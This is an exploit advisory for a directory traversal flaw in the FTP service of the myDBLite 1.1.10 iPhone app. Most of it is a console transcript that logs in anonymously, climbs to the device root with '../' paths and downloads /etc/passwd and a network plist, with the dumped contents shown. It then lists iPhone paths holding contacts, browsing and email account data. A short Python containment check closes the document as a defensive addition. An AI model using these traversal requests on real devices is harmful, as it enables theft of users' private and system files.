
iOS myDBLite 1.1.10 - Directory Traversal

Date: 24 Feb 2011
Reported by: R3d@l3rt, Sp@2K, Sunlight
Type: exploitpack

myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal vulnerability, Exploit Testin

Code
# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8
# Version: 1.1.10
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is a directory traversal vulnerability in myDBLite's FTP service:
# "../" sequences in client-supplied paths are not confined to the shared directory.
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 29161
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User  logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfig.plist
-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfigInit.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appData.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appDataInit.plist
-rw-r--r--     1 mobile mobile       9859 1??09 10:55 astonmartin.jpg
-rw-r--r--     1 mobile mobile         20 1??09 10:55 astonmartin.txt
-rw-r--r--     1 mobile mobile      11128 1??09 10:55 ferrari.jpg
-rw-r--r--     1 mobile mobile         74 1??09 10:55 ferrari.txt
-rw-r--r--     1 mobile mobile      32797 1??09 10:55 frey.jpg
-rw-r--r--     1 mobile mobile      17553 1??09 10:55 porsche.jpg
-rw-r--r--     1 mobile mobile        111 1??09 10:55 porsche.txt
-rw-r--r--     1 mobile mobile        422 2??24 15:20 pswd.bkup
-rw-r--r--     1 mobile mobile        422 2??24 15:21 pswd.plist
-rw-r--r--     1 mobile mobile      54378 1??09 10:55 schinznach.jpg
drwxr-xr-x    12 mobile mobile        476 1??04 14:43 secret

226 Transfer complete.
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.
ftp> cd ../../../../../../
250 CWD command successful.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rwxr-xr-x    40 root admin         30 10??26 01:20 Applications
drwxrwxr-x     1 root admin         68 8??19 04:10 Developer
drwxrwxr-x    24 root admin        884 1??12 12:53 Library
drwxr-xr-x     1 root wheel        102 8??19 04:18 System
-rwxr-xr-x     7 root admin         11 2??23 19:41 User
drwxr-xr-x    59 root wheel       2074 1??13 09:52 bin
drwxr-xr-x     1 root admin         68 10??26 01:19 boot
-rw-r--r--     1 (null) (null)        638 1??25 15:30 control
drwxrwxr-x     1 root admin         68 8??03 12:41 cores
----------     1 (null) (null)          0 (null) dev
-rwxr-xr-x    25 root admin         11 8??26 05:20 etc
drwxr-xr-x     1 root admin         68 10??26 01:19 lib
drwxr-xr-x     1 root admin         68 10??26 01:19 mnt
drwxr-xr-x     2 root wheel        136 10??23 15:12 private
drwxr-xr-x    47 root wheel       1666 1??13 09:52 sbin
-rwxr-xr-x     5 root admin         15 8??26 05:20 tmp
drwxr-xr-x     9 root wheel        374 1??13 09:52 usr
-rwxr-xr-x    26 root admin         11 8??26 05:20 var

226 Transfer complete.
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.
ftp> get ../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# iPhone internal information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. User's E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist
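
A server-side check that would refuse the `cd` and `get` requests shown in the transcript, as an added example (not code from myDBLite or from the advisory's authors). It treats "/" as the shared directory rather than the device root and verifies containment after resolving symlinks; `resolve_ftp_path`, `PathEscape` and the sandbox layout are assumptions made for illustration.

```python
import os
import posixpath
import tempfile

class PathEscape(Exception):
    """Client-supplied path resolves outside the share root."""

def resolve_ftp_path(share_root, virtual_cwd, client_arg):
    """Map a CWD/RETR argument to (virtual_path, real_path) inside share_root."""
    if "\x00" in client_arg:
        raise PathEscape(client_arg)
    # 1. Resolve against the session's *virtual* cwd, where "/" is the share
    #    root. normpath drops ".." at "/", so "../../.." cannot climb above it.
    virtual = posixpath.normpath(posixpath.join("/", virtual_cwd, client_arg))
    virtual = "/" + virtual.lstrip("/")
    # 2. Re-anchor under the real share root and resolve symlinks.
    root_real = os.path.realpath(share_root)
    candidate = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    # 3. Containment check on the resolved path catches symlinks that leave the root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathEscape(client_arg)
    return virtual, candidate

def demo():
    """Constructed sandbox: device/etc/passwd lies outside device/app/share."""
    with tempfile.TemporaryDirectory() as tmp:
        device = os.path.join(tmp, "device")
        share = os.path.join(device, "app", "share")
        os.makedirs(share)
        os.makedirs(os.path.join(device, "etc"))
        open(os.path.join(device, "etc", "passwd"), "w").close()
        open(os.path.join(share, "ferrari.txt"), "w").close()
        os.symlink(device, os.path.join(share, "link"))  # symlink out of the share
        results = {}
        for arg in ("ferrari.txt", "../../../../../etc/passwd", "link/etc/passwd"):
            try:
                virtual, real = resolve_ftp_path(share, "/", arg)
                results[arg] = (virtual, os.path.exists(real))
            except PathEscape:
                results[arg] = "rejected"
        return results

if __name__ == "__main__":
    for arg, outcome in demo().items():
        print(f"{arg!r:35} -> {outcome}")
```

A clamped request such as `/etc/passwd` then fails with an ordinary 550 reply, because no such file exists under the share.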
